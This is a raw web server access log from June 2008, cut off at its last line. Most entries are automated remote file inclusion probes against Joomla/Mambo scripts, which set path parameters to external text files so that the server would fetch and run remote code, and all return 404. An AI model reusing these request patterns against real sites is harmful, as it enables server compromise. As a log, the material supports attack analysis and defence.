202.221.143.111 - - [09/Jun/2008:13:35:27 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:13:36:04 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
160.99.12.231 - - [09/Jun/2008:13:36:31 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
160.99.12.231 - - [09/Jun/2008:13:36:31 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
160.99.12.231 - - [09/Jun/2008:13:36:32 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
151.1.32.12 - - [09/Jun/2008:13:50:04 -0700] "GET //index.php?abs_path=http://www.hmccalendar.com/youth/c?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.notahamsandwich.com"
151.1.32.12 - - [09/Jun/2008:13:50:04 -0700] "GET //index.php?abs_path=http://www.hmccalendar.com/youth/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.notahamsandwich.com"
151.1.32.12 - - [09/Jun/2008:13:50:04 -0700] "GET /logs//index.php?abs_path=http://www.hmccalendar.com/youth/c?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.notahamsandwich.com"
151.1.32.12 - - [09/Jun/2008:13:50:05 -0700] "GET /logs//index.php?abs_path=http://www.hmccalendar.com/youth/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.notahamsandwich.com"
70.86.5.10 - - [09/Jun/2008:14:02:00 -0700] "GET //errors.php?error=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
70.86.5.10 - - [09/Jun/2008:14:02:00 -0700] "GET /logs//errors.php?error=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.notahamsandwich.com"
70.86.5.10 - - [09/Jun/2008:14:03:23 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.notahamsandwich.com"
70.86.5.10 - - [09/Jun/2008:14:03:23 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.notahamsandwich.com"
72.14.199.72 - - [09/Jun/2008:14:20:01 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:14:26:14 -0700] "GET /logs/access_080519.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:14:30:30 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:14:30:31 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:14:31:05 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwi